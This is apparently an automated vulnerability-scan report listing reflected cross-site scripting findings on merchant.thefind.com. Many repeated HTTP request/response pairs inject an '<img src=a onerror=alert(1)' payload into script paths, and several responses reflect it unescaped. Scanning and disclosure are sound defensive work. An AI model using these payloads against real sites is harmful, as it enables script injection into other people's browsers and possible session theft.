GET /scriptse33ab<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:29 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 209 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/ajaxlib.js |
GET /scripts/utilsd4268<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:47 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 209 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/ajaxlib.js |
GET /scripts/utils/e18f5<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:18 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9551 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils.e18f5<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/browser.js |
GET /scriptsc2dd4<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:14 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 209 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/browser.js |
GET /scripts/utils73731<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:30 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 209 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/browser.js |
GET /scripts/utils/18a45<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:48 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9551 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils.18a45<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/elation.js |
GET /scriptsafb6b<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:39 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 209 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/elation.js |
GET /scripts/utils6ce8d<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:09 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 209 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/elation.js |
GET /scripts/utils/d0f19<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:58:00 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9551 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils.d0f19<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/events.js |
GET /scripts77722<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:17 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 206 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/events.js |
GET /scripts/utils5a9b8<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:33 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 207 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/events.js |
GET /scripts/utils/f041c<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:49 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9551 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils.f041c<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/initjquery |
GET /scripts912c9<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:25 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 215 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/initjquery |
GET /scripts/utils1b6e9<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:41 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 213 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/initjquery |
GET /scripts/utils/f2549<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:12 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9551 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils.f2549<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/msie-xpath |
GET /scripts49be8<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:27 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9550 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts49be8<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/msie-xpath |
GET /scripts/utils7e6c2<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:44 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9550 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils7e6c2<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/msie-xpath |
GET /scripts/utils/6ba5d<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:15 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9551 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils.6ba5d<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/panel.js |
GET /scriptse254e<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:21 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 205 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/panel.js |
GET /scripts/utils3caaa<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:39 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 204 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/panel.js |
GET /scripts/utils/d1791<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:10 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9551 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils.d1791<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/tracking |
GET /scripts3305d<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
